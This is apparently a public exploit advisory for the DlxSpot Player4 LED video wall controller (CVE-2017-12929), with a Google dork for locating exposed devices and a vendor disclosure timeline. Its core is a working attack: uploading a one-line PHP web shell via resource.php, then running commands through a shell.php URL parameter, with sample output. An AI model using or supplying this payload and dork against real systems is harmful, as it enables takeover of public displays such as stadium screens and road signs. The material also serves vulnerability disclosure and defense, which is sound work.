43 lines
No EOL
1.7 KiB
Text
43 lines
No EOL
1.7 KiB
Text
# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
|
|
to RCE
|
|
# Google Dork: "DlxSpot - Player4"
|
|
# Date: 2017-05-14
|
|
# Discoverer: Simon Brannstrom
|
|
# Authors Website: https://unknownpwn.github.io/
|
|
# Vendor Homepage: http://www.tecnovision.com/
|
|
# Software Link: n/a
|
|
# Version: >1.5.10
|
|
# Tested on: Linux
|
|
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
|
|
all over the world, they are used in football arenas, concert halls,
|
|
shopping malls, as roadsigns etc.
|
|
# CVE: CVE-2017-12929
|
|
# Linked CVE's: CVE-2017-12928, CVE-2017-12930.
|
|
|
|
# Visit my github page at
|
|
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
|
|
for complete takeover of the box, from SQLi to root access.
|
|
###############################################################################################################################
|
|
|
|
Arbitrary File Upload leading to Remote Command Execution:
|
|
|
|
1. Visit http://host/resource.php and upload PHP shell. For example: <?php
|
|
system($_GET["c"]); ?>
|
|
2. RCE via http://host/resource/source/shell.php?c=id
|
|
3. Output: www-data
|
|
|
|
TIMELINE:
|
|
2017-05-14 - Discovery of vulnerabilities.
|
|
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
|
|
homepage.
|
|
2017-06-01 - No response, tried contacting again through several contact
|
|
forms on homepage.
|
|
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
|
|
requesting CVE assignment.
|
|
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
|
|
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
|
|
email in Italian to the company.
|
|
2017-09-18 - No response, full public disclosure.
|
|
|
|
DEDICATED TO MARCUS ASTROM
|
|
FOREVER LOVED - NEVER FORGOTTEN |